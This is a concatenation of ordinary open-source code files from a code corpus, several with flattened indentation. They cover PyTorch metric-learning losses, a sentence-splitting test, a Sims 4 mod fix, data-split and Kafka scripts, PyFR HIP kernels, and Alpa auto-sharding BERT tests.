            beta_regularisation_loss = self.nu * torch.sum(beta)
            loss = loss + beta_regularisation_loss.type(torch.cuda.FloatTensor)
return loss
"""================================================================================================="""
### ProxyNCALoss containing trainable class proxies. Works independent of batch size.
class ProxyNCALoss(torch.nn.Module):
def __init__(self, num_proxies, embedding_dim):
"""
Basic ProxyNCA Loss as proposed in 'No Fuss Distance Metric Learning using Proxies'.
Args:
num_proxies: int, number of proxies to use to estimate data groups. Usually set to number of classes.
embedding_dim: int, Required to generate initial proxies which are the same size as the actual data embeddings.
Returns:
Nothing!
"""
super(ProxyNCALoss, self).__init__()
self.num_proxies = num_proxies
self.embedding_dim = embedding_dim
self.PROXIES = torch.nn.Parameter(torch.randn(num_proxies, self.embedding_dim) / 8)
self.all_classes = torch.arange(num_proxies)
def forward(self, batch, labels):
"""
Args:
batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings
labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1]
Returns:
proxynca loss (torch.Tensor(), batch-averaged)
"""
#Normalize batch in case it is not normalized (which should never be the case for ProxyNCA, but still).
#Same for the PROXIES. Note that the multiplication by 3 seems arbitrary, but helps the actual training.
batch = 3*torch.nn.functional.normalize(batch, dim=1)
PROXIES = 3*torch.nn.functional.normalize(self.PROXIES, dim=1)
#Group required proxies
pos_proxies = torch.stack([PROXIES[pos_label:pos_label+1,:] for pos_label in labels])
neg_proxies = torch.stack([torch.cat([self.all_classes[:class_label],self.all_classes[class_label+1:]]) for class_label in labels])
neg_proxies = torch.stack([PROXIES[neg_labels,:] for neg_labels in neg_proxies])
#Compute Proxy-distances
dist_to_neg_proxies = torch.sum((batch[:,None,:]-neg_proxies).pow(2),dim=-1)
dist_to_pos_proxies = torch.sum((batch[:,None,:]-pos_proxies).pow(2),dim=-1)
#Compute final proxy-based NCA loss
negative_log_proxy_nca_loss = torch.mean(dist_to_pos_proxies[:,0] + torch.logsumexp(-dist_to_neg_proxies, dim=1))
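        # Editor's note: with squared distances d(.,.), this is the batch mean of
        # -log[ exp(-d(x, p_y)) / sum_{c != y} exp(-d(x, p_c)) ]
        #   = d(x, p_y) + logsumexp_c(-d(x, p_c)),
        # i.e. the NCA objective with class proxies standing in for the data points.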
return negative_log_proxy_nca_loss
"""================================================================================================="""
class CEClassLoss(torch.nn.Module):
def __init__(self, inp_dim, n_classes):
"""
Basic Cross Entropy Loss for reference. Can be useful.
Contains its own mapping network, so the actual network can remain untouched.
Args:
inp_dim: int, embedding dimension of network.
n_classes: int, number of target classes.
Returns:
Nothing!
"""
super(CEClassLoss, self).__init__()
self.mapper = torch.nn.Sequential(torch.nn.Linear(inp_dim, n_classes))
self.ce_loss = torch.nn.CrossEntropyLoss()
def forward(self, batch, labels):
"""
Args:
batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings
labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1]
Returns:
cross-entropy loss (torch.Tensor(), batch-averaged by default)
"""
return self.ce_loss(self.mapper(batch), labels.type(torch.cuda.LongTensor))
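"""================================================================================================="""
### Editor's note: illustrative end-to-end sketch, not part of the original file.
def _demo_triplet_loss():
    """Runs TripletLoss on a random batch; the batch size, embedding dimension
    and two-samples-per-class labelling are assumptions made for this sketch."""
    torch.manual_seed(0)
    batch = torch.randn(8, 32, requires_grad=True) # (BS x embed_dim)
    labels = np.array([0, 0, 1, 1, 2, 2, 3, 3])    # two samples per class
    criterion = TripletLoss(margin=0.2, sampling_method='random')
    loss = criterion(batch, labels)
    loss.backward()
    return loss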
|
tests/pipes/test_sents.py
|
hp0404/spikex
| 339 |
85786
|
from spikex.defaults import spacy_version
from spikex.pipes import SentX
SENTS = [
"This is a bullet list that we want to be a unique sentence:\n"
"\ta) the first bullet;\n"
"\tb) the second bullet;\n"
"\tc) a bullet with nested bullets:\n"
"\t\t1) first nested bullet;"
"\t\t2) second nested bullet."
"\td) last bullet.\n",
"Paragraph title ",
"The title was misformatted with the text. ",
"Now we try to split on abbreviations like Figs. 1 or Fig. 2. ",
"They can create confusion, like No.42 or eg. Num. 42 or U.S.; ",
"these are some cases, but there could it be more out there.",
]
def test_splitta(nlp):
sentx_pipe = SentX() if spacy_version < 3 else "sentx"
nlp.add_pipe(sentx_pipe, before="parser")
doc = nlp("".join(SENTS))
assert len([s for s in doc.sents]) == len(SENTS)
|
src/sims4communitylib/_vanilla_fixes/_sim_full_name.py
|
velocist/TS4CheatsInfo
| 118 |
85788
|
"""
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
# The purpose of this file is to fix the fact that when trying to access the "full_name" attribute on Sims an empty string is returned.
# noinspection PyBroadException
from sims.sim_info import SimInfo
from sims4communitylib.modinfo import ModInfo
from sims4communitylib.utils.common_injection_utils import CommonInjectionUtils
from sims4communitylib.utils.sims.common_sim_name_utils import CommonSimNameUtils
from sims4communitylib.utils.sims.common_sim_utils import CommonSimUtils
@CommonInjectionUtils.inject_safely_into(ModInfo.get_identity(), SimInfo, 'full_name')
def _common_fix_full_name_returning_empty_string(original, self: SimInfo, *_, **__):
original_value = original(self, *_, **__)
if original_value == '':
return CommonSimNameUtils.get_full_name(CommonSimUtils.get_sim_info(self))
return original_value
|
braindecode/experiments/__init__.py
|
TonioBall/braindecode
| 260 |
85806
|
"""
Convenience classes for experiments, including monitoring and stop criteria.
"""
|
tools/prepare_data_subset.py
|
xiaoMrzhang/Pytorch_Generalized_3D_Lane_Detection
| 186 |
85822
|
"""
This code conducts:
1. exclude a subset of data related to a certain illumination condition from an existing training set
2. keep a subset of data related to the same illumination condition from an existing test set
ATTENTION: this code requires running prepare_data_split.py first
Author: <NAME> (<EMAIL>)
Date: March, 2020
"""
import os
import os.path as ops
if __name__ == '__main__':
batch_size = 8 # use to ignore the last for convenience
# exclude subsets from train
name_pattens_to_exclude = ['/00/', '/01/', '/06/', '/07/']
output_folder = '../data_splits/illus_chg/'
if not ops.exists(output_folder):
os.makedirs(output_folder)
lines_train = []
json_file_path = "../data_splits/standard/train.json"
assert ops.exists(json_file_path), '{:s} not exist'.format(json_file_path)
with open(json_file_path) as f:
lines_i = f.readlines()
f.close()
for line in lines_i:
to_discard = False
for name_patten in name_pattens_to_exclude:
if name_patten in line:
to_discard = True
break
if not to_discard:
lines_train.append(line)
lines_train = lines_train[:len(lines_train)//batch_size*batch_size]
with open(output_folder + '/train.json', 'w') as f:
f.writelines("%s" % l for l in lines_train)
f.close()
#########################################################################################
# include subsets in test
name_pattens_to_include = ['/00/', '/01/', '/06/', '/07/']
lines_test = []
json_file_path = "../data_splits/standard/test.json"
assert ops.exists(json_file_path), '{:s} not exist'.format(json_file_path)
with open(json_file_path) as f:
lines_i = f.readlines()
f.close()
    for line in lines_i:
        for name_patten in name_pattens_to_include:
            if name_patten in line:
                lines_test.append(line)
                break
lines_test = lines_test[:len(lines_test) // batch_size * batch_size]
with open(output_folder + '/test.json', 'w') as f:
f.writelines("%s" % l for l in lines_test)
f.close()
|
example/producer.py
|
Semo/kq
| 582 |
85839
|
from kafka import KafkaProducer
producer = KafkaProducer(bootstrap_servers="127.0.0.1:9092")
for _ in range(10000):
producer.send("my_topic", b"message")
# producer.flush()
|
pyfr/backends/hip/packing.py
|
rishit2307/PyFR
| 185 |
85850
|
# -*- coding: utf-8 -*-
from pyfr.backends.base import NullKernel
from pyfr.backends.hip.provider import (HIPKernel, HIPKernelProvider,
get_grid_for_block)
class HIPPackingKernels(HIPKernelProvider):
def pack(self, mv):
hip = self.backend.hip
# An exchange view is simply a regular view plus an exchange matrix
m, v = mv.xchgmat, mv.view
# Compute the grid and thread-block size
block = (128, 1, 1)
grid = get_grid_for_block(block, v.n)
# Render the kernel template
src = self.backend.lookup.get_template('pack').render(blocksz=block[0])
# Build
kern = self._build_kernel('pack_view', src, 'iiiPPPP')
# Set the arguments
params = kern.make_params(grid, block)
params.set_args(v.n, v.nvrow, v.nvcol, v.basedata, v.mapping,
v.rstrides or 0, m)
# If MPI is HIP aware then we just need to pack the buffer
if self.backend.mpitype == 'hip-aware':
class PackXchgViewKernel(HIPKernel):
def add_to_graph(self, graph, deps):
pass
def run(self, stream):
kern.exec_async(stream, params)
# Otherwise, we need to both pack the buffer and copy it back
else:
class PackXchgViewKernel(HIPKernel):
def add_to_graph(self, graph, deps):
pass
def run(self, stream):
kern.exec_async(stream, params)
hip.memcpy(m.hdata, m.data, m.nbytes, stream)
return PackXchgViewKernel(mats=[mv])
def unpack(self, mv):
hip = self.backend.hip
if self.backend.mpitype == 'hip-aware':
return NullKernel()
else:
class UnpackXchgMatrixKernel(HIPKernel):
def add_to_graph(self, graph, deps):
pass
def run(self, stream):
hip.memcpy(mv.data, mv.hdata, mv.nbytes, stream)
return UnpackXchgMatrixKernel(mats=[mv])
|
tests/test_auto_sharding_bert.py
|
alpa-projects/alpa
| 114 |
85856
|
<filename>tests/test_auto_sharding_bert.py
"""Test auto sharding on transformer layers and bert models."""
import unittest
import jax
import jax.numpy as jnp
import numpy as np
from flax import optim, linen as nn
from alpa import parallelize, ShardParallel, LocalPhysicalDeviceMesh, AutoShardingOption
from alpa.model.bert_model import (BertConfig, FlaxBertLayerCollection,
FlaxBertForMaskedLMModule)
from alpa.util import count_communication_primitives
from test_auto_sharding_mlp import (
assert_all_replicated, assert_close, assert_column_partitioned,
assert_data_parallel_cost, assert_fully_sharded, assert_less_equal,
assert_sharded, assert_replicated_column_partitioned,
assert_replicated_row_partitioned, assert_row_partitioned, is_fully_sharded,
assert_sharding_zero_stage_3)
class AutoShardingAttentionTest(unittest.TestCase):
def setUp(self):
assert len(jax.local_devices()) >= 4
self.physical_mesh = LocalPhysicalDeviceMesh(jax.local_devices()[:4])
self.as_option = AutoShardingOption()
def get_device_mesh(self, shape, mesh_alpha, mesh_beta):
return self.physical_mesh.get_logical_mesh(shape, mesh_alpha, mesh_beta)
def run_bert_layers(self, batch_size, seq_len, num_layers, hidden_size,
num_heads, deterministic, use_remat, device_mesh):
@parallelize(method=ShardParallel(devices=device_mesh,
auto_sharding_option=self.as_option))
def train_step(optimizer, batch, deterministic, apply_fn):
def loss_func(params):
rngs = {"dropout": batch["rng"]}
out = apply_fn(params,
batch["hidden_states"],
batch["attention_mask"],
deterministic,
rngs=rngs)[0]
return jnp.mean((out - batch["label"])**2)
grad = jax.grad(loss_func)(optimizer.target)
new_optimizer = optimizer.apply_gradient(grad)
return new_optimizer
# Init model and optimizer
hidden_states = jnp.ones((batch_size, seq_len, hidden_size),
dtype=jnp.float32)
attention_mask = jnp.ones((batch_size, seq_len), dtype=jnp.int32)
label = jnp.ones((batch_size, seq_len, hidden_size), dtype=jnp.float32)
model = FlaxBertLayerCollection(
BertConfig(num_hidden_layers=num_layers,
hidden_size=hidden_size,
intermediate_size=hidden_size * 4,
num_attention_heads=num_heads,
gradient_checkpointing=use_remat))
rngkey = jax.random.PRNGKey(0)
params = model.init(rngkey, hidden_states, attention_mask)
optimizer = optim.Adam(1e-2).create(params)
# JIT compile
optimizer = train_step(
optimizer, {
"hidden_states": hidden_states,
"attention_mask": attention_mask,
"label": label,
"rng": rngkey
}, deterministic, model.apply)
# Get optimized HLO IR
executable = train_step.get_executable(
optimizer, {
"hidden_states": hidden_states,
"attention_mask": attention_mask,
"label": label,
"rng": rngkey
}, deterministic, model.apply)
return (optimizer, executable.get_hlo_text(),
executable.auto_sharding_objective)
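# The three values returned above drive the assertions in the tests below:
# the sharded optimizer is inspected for per-weight sharding specs, the
# optimized HLO text is scanned with count_communication_primitives, and the
# auto-sharding objective is compared against an analytical cost estimate.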
def run_bert_mlm(self, batch_size, seq_len, num_layers, hidden_size,
num_heads, vocab_size, deterministic, device_mesh):
@parallelize(method=ShardParallel(devices=device_mesh,
auto_sharding_option=self.as_option))
def train_step(optimizer, batch):
def loss_func(params):
rngs = {"dropout": batch["rng"]}
logits = model.apply(params,
batch["input_ids"],
batch["attention_mask"],
batch["token_type_ids"],
batch["position_ids"],
deterministic=deterministic,
rngs=rngs)[0]
label_mask = jnp.where(batch["labels"] > 0, 1.0, 0.0)
labels = jax.nn.one_hot(batch["labels"], logits.shape[-1])
loss = -jnp.sum(labels * jax.nn.log_softmax(logits, axis=-1),
axis=-1)
return (label_mask * loss).sum() / label_mask.sum() * 0.1234
grad = jax.grad(loss_func)(optimizer.target)
new_optimizer = optimizer.apply_gradient(grad)
return new_optimizer
# Init model and optimizer
input_ids = jnp.ones((batch_size, seq_len), dtype=jnp.int32)
attention_mask = jnp.ones((batch_size, seq_len), dtype=jnp.int32)
token_type_ids = jnp.ones((batch_size, seq_len), dtype=jnp.int32)
position_ids = jnp.ones((batch_size, seq_len), dtype=jnp.int32)
labels = jnp.ones((batch_size, seq_len), dtype=jnp.int32)
model = FlaxBertForMaskedLMModule(
BertConfig(
num_hidden_layers=num_layers,
hidden_size=hidden_size,
intermediate_size=hidden_size * 4,
num_attention_heads=num_heads,
vocab_size=vocab_size,
max_position_embeddings=seq_len,
))
rngkey = jax.random.PRNGKey(0)
params = model.init(rngkey, input_ids, attention_mask, token_type_ids,
position_ids)
optimizer = optim.Adam(1e-2).create(params)
# JIT compile
optimizer = train_step(
optimizer, {
"input_ids": input_ids,
"attention_mask": attention_mask,
"token_type_ids": token_type_ids,
"position_ids": position_ids,
"labels": labels,
"rng": rngkey
})
# Get optimized HLO IR
executable = train_step.get_executable(
optimizer, {
"input_ids": input_ids,
"attention_mask": attention_mask,
"token_type_ids": token_type_ids,
"position_ids": position_ids,
"labels": labels,
"rng": rngkey
})
return (optimizer, executable.get_hlo_text(),
executable.auto_sharding_objective)
def test_bert_layer_data_parallel(self):
batch_size = 64
seq_len = 64
num_layers = 2
hidden_size = 32
num_heads = 8
deterministic = False
use_remat = False
# Test on different logical mesh shapes
for i, mesh_shape in enumerate([(4, 1), (1, 4)]):
device_mesh = self.get_device_mesh(mesh_shape, [1, 1], [1, 1])
optimizer, hlo_ir, objective = self.run_bert_layers(
batch_size, seq_len, num_layers, hidden_size, num_heads,
deterministic, use_remat, device_mesh)
assert_data_parallel_cost(optimizer, hlo_ir, objective, device_mesh,
self.as_option, i)
def test_bert_layer_model_parallel(self):
batch_size = 8
seq_len = 8
num_layers = 2
hidden_size = 128
num_heads = 8
deterministic = False
use_remat = False
# Test on different logical mesh shapes
for i, mesh_shape in enumerate([(4, 1), (1, 4)]):
device_mesh = self.get_device_mesh(mesh_shape, [1, 1], [1, 1])
optimizer, hlo_ir, objective = self.run_bert_layers(
batch_size, seq_len, num_layers, hidden_size, num_heads,
deterministic, use_remat, device_mesh)
# Check communication cost
expected = (num_layers * 4 - 1) * device_mesh.all_reduce_cost(
batch_size * seq_len * hidden_size * 4, i)
assert_close(objective, expected)
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_ir))
if self.as_option.prefer_reduce_scatter:
assert n_total == num_layers * 4 - 1
assert n_all_reduce == num_layers * 4 - 1
assert n_total == n_all_reduce
else:
assert n_total == num_layers * 4 - 1
assert n_all_reduce == num_layers * 4 - 1
assert n_total == n_all_reduce
# Check sharding specification
for k in range(num_layers):
params = optimizer.target["params"][str(k)]
weights = [
params["attention"]["self"]["qvk_combined"]["kernel"],
params["attention"]["output"]["dense"]["kernel"],
params["intermediate"]["dense"]["kernel"],
params["output"]["dense"]["kernel"],
]
for j in range(len(weights)):
if j % 2 == 0:
assert_column_partitioned(weights[j], mesh_shape[i], i)
else:
assert_row_partitioned(weights[j], mesh_shape[i], i)
def test_bert_layer_2d_mesh(self):
batch_size = 8
seq_len = 8
num_layers = 2
hidden_size = 128
num_heads = 8
deterministic = False
use_remat = False
# Test on different logical mesh shapes
mesh_shape = [2, 2]
device_mesh = self.get_device_mesh(mesh_shape, [2, 2], [1, 0.1])
optimizer, hlo_ir, objective = self.run_bert_layers(
batch_size, seq_len, num_layers, hidden_size, num_heads,
deterministic, use_remat, device_mesh)
# Check communication cost
params = jax.tree_util.tree_leaves(optimizer.target)
expected = (sum(
device_mesh.all_reduce_cost(
np.prod(x.shape) * 4 / mesh_shape[1], 0)
for x in params) + device_mesh.all_reduce_cost(
batch_size * seq_len * hidden_size * 4 / mesh_shape[0], 1) *
(num_layers * 4 - 1))
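# In words: one gradient all-reduce per parameter tensor along mesh dim 0
# (each tensor is sharded over the mesh_shape[1] axis, hence the division),
# plus (num_layers * 4 - 1) activation all-reduces along mesh dim 1, with the
# activations sharded over the mesh_shape[0] batch axis.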
assert_close(objective, expected)
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_ir,
ignore_scalar_all_reduce=True))
if self.as_option.prefer_reduce_scatter:
assert n_all_reduce == num_layers * 4 - 1
assert n_reduce_scatter == 2
assert n_all_gather == 1
assert n_total == n_all_reduce + n_reduce_scatter + n_all_gather
else:
assert n_all_reduce == num_layers * 4
assert n_total == n_all_reduce
# Check sharding specification
if self.as_option.prefer_reduce_scatter:
for weight in jax.tree_util.tree_leaves(
optimizer.state.param_states):
if len(weight.shape) > 1:
assert_fully_sharded(weight)
else:
for k in range(num_layers):
params = optimizer.target["params"][str(k)]
weights = [
params["attention"]["self"]["qvk_combined"]["kernel"],
params["attention"]["output"]["dense"]["kernel"],
params["intermediate"]["dense"]["kernel"],
params["output"]["dense"]["kernel"],
]
for j in range(len(weights)):
if j % 2 == 0:
assert_replicated_column_partitioned(
weights[j], mesh_shape)
else:
assert_replicated_row_partitioned(
weights[j], mesh_shape)
def test_bert_layer_force_batch_dim_mapping(self):
batch_size = 64
seq_len = 64
num_layers = 2
hidden_size = 32
num_heads = 8
deterministic = False
use_remat = False
self.as_option.force_batch_dim_to_mesh_dim = 0
# data parallel
device_mesh = self.get_device_mesh([4, 1], [1, 1], [1, 1])
optimizer, hlo_ir, objective = self.run_bert_layers(
batch_size, seq_len, num_layers, hidden_size, num_heads,
deterministic, use_remat, device_mesh)
assert_data_parallel_cost(optimizer, hlo_ir, objective, device_mesh, self.as_option, 0)
# model parallel (case 1)
device_mesh = self.get_device_mesh([1, 4], [1, 1], [1, 1])
optimizer, hlo_ir, objective = self.run_bert_layers(
batch_size, seq_len, num_layers, hidden_size, num_heads,
deterministic, use_remat, device_mesh)
expected = (num_layers * 4 - 1) * device_mesh.all_reduce_cost(
batch_size * seq_len * hidden_size * 4, 1)
assert_close(objective, expected)
# model parallel (case 2)
batch_size = 1
device_mesh = self.get_device_mesh([1, 4], [1, 1], [1, 1])
optimizer, hlo_ir, objective = self.run_bert_layers(
batch_size, seq_len, num_layers, hidden_size, num_heads,
deterministic, use_remat, device_mesh)
expected = (num_layers * 4 - 1) * device_mesh.all_reduce_cost(
batch_size * seq_len * hidden_size * 4, 1)
assert_close(objective, expected)
def test_embedding_2d_mesh(self):
vocab_size = 1024
hidden_size = 8
batch_size = 8
seq_len = 8
mesh_shape = [2, 2]
# Model and training step definition
class Model(nn.Module):
"""Tied input and output embedding."""
def setup(self):
self.embed = nn.Embed(vocab_size, hidden_size)
def __call__(self, x):
x = self.embed(x)
embed = self.embed.variables["params"]["embedding"]
x = x @ embed.T
return x
logical_mesh = self.get_device_mesh(mesh_shape, [1, 1], [1, 1])
@parallelize(method=ShardParallel(devices=logical_mesh))
def func(optimizer, x, y):
def loss_func(params):
out = model.apply(params, x)
y_ = jax.nn.one_hot(y, out.shape[-1])
loss = -jnp.sum(y_ * jax.nn.log_softmax(out, axis=-1), axis=-1)
return loss.sum()
grad = jax.grad(loss_func)(optimizer.target)
new_optimizer = optimizer.apply_gradient(grad)
return new_optimizer
# Init model and optimizer
x = jnp.ones((batch_size, seq_len), np.int32)
y = jnp.ones((batch_size, seq_len), np.int32)
model = Model()
rngkey = jax.random.PRNGKey(0)
params = model.init(rngkey, x)
optimizer = optim.Adam(1e-2).create(params)
# JIT Compile
optimize = func(optimizer, x, y)
# Check communication cost
executable = func.get_executable(optimizer, x, y)
hlo_ir = executable.get_hlo_text()
objective = executable.auto_sharding_objective
params = jax.tree_util.tree_leaves(optimizer.target)
expected = (
logical_mesh.all_reduce_cost(
vocab_size * hidden_size * 4 / mesh_shape[1], 0) +
logical_mesh.all_reduce_cost(
batch_size * seq_len * hidden_size * 4 / mesh_shape[0], 1) * 2 +
logical_mesh.all_reduce_cost(
batch_size * seq_len * 4 / mesh_shape[0], 1) * 2)
assert_close(objective, expected)
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_ir))
assert n_total == n_all_reduce
def test_bert_mlm_data_parallel(self):
batch_size = 32
seq_len = 32
num_layers = 2
hidden_size = 16
num_heads = 4
vocab_size = 128
deterministic = False
# Test on different logical mesh shapes
for i, mesh_shape in enumerate([(4, 1), (1, 4)]):
device_mesh = self.get_device_mesh(mesh_shape, [1, 1], [1, 1])
optimizer, hlo_ir, objective = self.run_bert_mlm(
batch_size, seq_len, num_layers, hidden_size, num_heads,
vocab_size, deterministic, device_mesh)
if self.as_option.force_zero_stage_3:
# only the weight and opt_state of token_embed is not sharded
assert_sharding_zero_stage_3(optimizer, 3)
continue
assert_data_parallel_cost(optimizer, hlo_ir, objective, device_mesh,
self.as_option, i, 1)
@unittest.skip("This test is broken after we disallow some replicated iota.")
def test_bert_mlm_model_parallel(self):
batch_size = 16
seq_len = 16
num_layers = 2
hidden_size = 128
num_heads = 4
vocab_size = 512
deterministic = False
self.as_option.allow_all_gather = False # Temporary hack
self.as_option.allow_all_to_all = False # Temporary hack
# Test on different logical mesh shapes
for i, mesh_shape in enumerate([(4, 1), (1, 4)]):
device_mesh = self.get_device_mesh(mesh_shape, [1, 1], [1, 1])
optimizer, hlo_ir, objective = self.run_bert_mlm(
batch_size, seq_len, num_layers, hidden_size, num_heads,
vocab_size, deterministic, device_mesh)
# Check communication cost
# expected_cost = embed.forward (1) + embed.backward(2) +
# LM_head.forward (1) + LM_head.backward (1) +
# LM_head.weight.backward (1) + log_softmax.forward (2) +
# transformer.forward (2 * num_layers) + transformer.backward (2 * num_layers)
#
# Note that the final cost is different from this estimated cost in ILP solver.
# The SPMD partitioner will eliminate some unnecessary communication in favor of
# redundant computation (e.g., it will eliminate the all-reduce in embed.backward).
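# Worked count for num_layers = 2: the estimate below sums
# 5 + 1 + 2 + 4 * 2 = 16 all-reduce terms, while the compiled HLO is expected
# to contain only 4 * 2 + 4 = 12 all-reduce ops (see the n_all_reduce
# assertion further down), precisely because of the eliminations noted above.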
expected = (
device_mesh.all_reduce_cost(
batch_size * seq_len * hidden_size * 4, i) * 5 +
device_mesh.all_reduce_cost(hidden_size * hidden_size * 4, i) +
device_mesh.all_reduce_cost(batch_size * seq_len * 4, i) * 2 +
device_mesh.all_reduce_cost(
batch_size * seq_len * hidden_size * 4, i) * num_layers * 4)
assert_close(objective, expected)
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_ir))
# real number of all-reduce = transformers (4 * num_layers) + log_softmax (2) +
# embed.forward (1) + embed.backward (1)
assert n_all_reduce == num_layers * 4 + 4
assert n_total == n_all_reduce
# Check sharding specification
embed_weight = optimizer.target["params"]["bert"]["embeddings"][
"word_embeddings"]["embedding"]
lm_head = optimizer.target["params"]["cls"]["predictions"][
"transform"]["dense"]["kernel"]
assert_row_partitioned(embed_weight, mesh_shape[i], i)
assert_all_replicated(lm_head, np.prod(mesh_shape))
for k in range(num_layers):
params = optimizer.target["params"]["bert"]["encoder"]["layer"][
str(k)]
weights = [
params["attention"]["self"]["qvk_combined"]["kernel"],
params["attention"]["output"]["dense"]["kernel"],
params["intermediate"]["dense"]["kernel"],
params["output"]["dense"]["kernel"],
]
for j in range(len(weights)):
if j % 2 == 0:
assert_column_partitioned(weights[j], mesh_shape[i], i)
else:
assert_row_partitioned(weights[j], mesh_shape[i], i)
def test_bert_mlm_2d_mesh(self):
batch_size = 4
seq_len = 4
num_layers = 2
hidden_size = 512
num_heads = 4
vocab_size = 4096
deterministic = False
# To generate the desired strategy, we have to turn off mixed mesh shape and all-gather
# and enable recomputing heavy ops.
self.as_option.allow_recompute_heavy_op = True
self.as_option.allow_all_gather = False
self.as_option.allow_mixed_mesh_shape = False
mesh_shape = [2, 2]
device_mesh = self.get_device_mesh(mesh_shape, [2, 2], [1, 0.1])
optimizer, hlo_ir, objective = self.run_bert_mlm(
batch_size, seq_len, num_layers, hidden_size, num_heads, vocab_size,
deterministic, device_mesh)
# Check communication cost.
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_ir,
ignore_scalar_all_reduce=True))
if self.as_option.prefer_reduce_scatter:
assert n_all_reduce == 4 * num_layers + 2 + 2
assert n_reduce_scatter <= 3 # The correct number should be 2,
# but GpuMultiOutputFusion can make
# some reduce-scatter unable to be combined
assert n_all_gather == 1
assert n_total == n_all_reduce + n_all_gather + n_reduce_scatter
else:
# real number of all-reduce = transformers (4 * num_layers) + log_softmax (2) +
# embed.forward (1) + embed.backward (1) + weights (1)
assert n_all_reduce == 4 * num_layers + 2 + 2 + 1
assert n_total == n_all_reduce
# Check sharding specification
assert "s32[4,4,4096]{2,1,0} iota()" not in hlo_ir
assert "s32[2,4,2048]{2,1,0} iota()" in hlo_ir
if self.as_option.prefer_reduce_scatter:
num_not_sharded = 0 # allow the token_type_embeddings not partitioned.
for weight in jax.tree_util.tree_leaves(
optimizer.state.param_states):
if len(weight.shape) > 1:
if not is_fully_sharded(weight):
num_not_sharded += 1
assert num_not_sharded <= 2
else:
embed_weight = (optimizer.target["params"]["bert"]["embeddings"]
["word_embeddings"]["embedding"])
lm_head = (optimizer.target["params"]["cls"]["predictions"]
["transform"]["dense"]["kernel"])
assert_replicated_row_partitioned(embed_weight, mesh_shape)
assert_all_replicated(lm_head, np.prod(mesh_shape))
for k in range(num_layers):
params = optimizer.target["params"]["bert"]["encoder"]["layer"][
str(k)]
weights = [
params["attention"]["self"]["qvk_combined"]["kernel"],
params["attention"]["output"]["dense"]["kernel"],
params["intermediate"]["dense"]["kernel"],
params["output"]["dense"]["kernel"],
]
for j in range(len(weights)):
if j % 2 == 0:
assert_replicated_column_partitioned(
weights[j], mesh_shape)
else:
assert_replicated_row_partitioned(
weights[j], mesh_shape)
def test_bert_layer_data_parallel_reduce_scatter(self):
self.as_option.prefer_reduce_scatter = True
self.test_bert_layer_data_parallel()
def test_bert_layer_model_parallel_reduce_scatter(self):
self.as_option.prefer_reduce_scatter = True
self.test_bert_layer_model_parallel()
def test_bert_layer_2d_mesh_reduce_scatter(self):
self.as_option.prefer_reduce_scatter = True
self.test_bert_layer_2d_mesh()
def test_bert_mlm_data_parallel_reduce_scatter(self):
self.as_option.prefer_reduce_scatter = True
self.test_bert_mlm_data_parallel()
def test_bert_mlm_data_parallel_reduce_scatter_zero_3(self):
self.as_option.force_zero_stage_3 = True
self.as_option.force_zero_stage_3_all_gather_threshold = 1
self.test_bert_mlm_data_parallel()
@unittest.skip("This test is broken after we disallow some replicated iota.")
def test_bert_mlm_model_parallel_reduce_scatter(self):
self.as_option.prefer_reduce_scatter = True
self.test_bert_mlm_model_parallel()
def test_bert_mlm_2d_mesh_reduce_scatter(self):
self.as_option.prefer_reduce_scatter = True
self.test_bert_mlm_2d_mesh()
def test_bert_layer_model_parallel_remat(self):
batch_size = 8
seq_len = 8
num_layers = 2
hidden_size = 128
num_heads = 8
deterministic = False
use_remat = True
# Test on different logical mesh shapes
for i, mesh_shape in enumerate([(4, 1), (1, 4)]):
device_mesh = self.get_device_mesh(mesh_shape, [1, 1], [1, 1])
optimizer, hlo_ir, objective = self.run_bert_layers(
batch_size, seq_len, num_layers, hidden_size, num_heads,
deterministic, use_remat, device_mesh)
expected = (num_layers * 6 - 1) * device_mesh.all_reduce_cost(
batch_size * seq_len * hidden_size * 4, i)
assert_close(objective, expected)
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_ir))
assert n_total == num_layers * 6 - 1
assert n_all_reduce == num_layers * 6 - 1
assert n_total == n_all_reduce
def suite():
suite = unittest.TestSuite()
def add(name):
suite.addTest(AutoShardingAttentionTest(name))
add("test_bert_layer_data_parallel")
add("test_bert_layer_model_parallel")
add("test_bert_layer_2d_mesh")
add("test_bert_layer_force_batch_dim_mapping")
add("test_embedding_2d_mesh")
add("test_bert_mlm_data_parallel")
add("test_bert_mlm_model_parallel")
add("test_bert_mlm_2d_mesh")
add("test_bert_layer_data_parallel_reduce_scatter")
add("test_bert_layer_model_parallel_reduce_scatter")
add("test_bert_layer_2d_mesh_reduce_scatter")
add("test_bert_mlm_data_parallel_reduce_scatter")
add("test_bert_mlm_model_parallel_reduce_scatter")
add("test_bert_mlm_2d_mesh_reduce_scatter")
add("test_bert_mlm_data_parallel_reduce_scatter_zero_3")
add("test_bert_layer_model_parallel_remat")
return suite
if __name__ == "__main__":
runner = unittest.TextTestRunner()
runner.run(suite())
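# Editorial note: a single case can also be run with the standard unittest CLI,
# e.g. (the module path is an assumption about the repository layout):
#   python -m unittest tests.test_auto_sharding_bert.AutoShardingAttentionTest.test_bert_layer_data_parallel
# Every case requires at least 4 local devices (see setUp above).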
|
sunpy/visualization/visualization.py
|
LaudateCorpus1/sunpy
| 628 |
85866
|
<reponame>LaudateCorpus1/sunpy<filename>sunpy/visualization/visualization.py<gh_stars>100-1000
"""
This module provides plotting support in IPython.
"""
from functools import wraps
import matplotlib.pyplot as plt
__all__ = ['peek_show', "axis_labels_from_ctype"]
def peek_show(func):
"""
A decorator to place on ``peek()`` methods to show the figure.
The ``peek()`` method should return the figure then this method will
attempt to show it in the correct way. This decorator will not return the
figure to the user.
"""
@wraps(func)
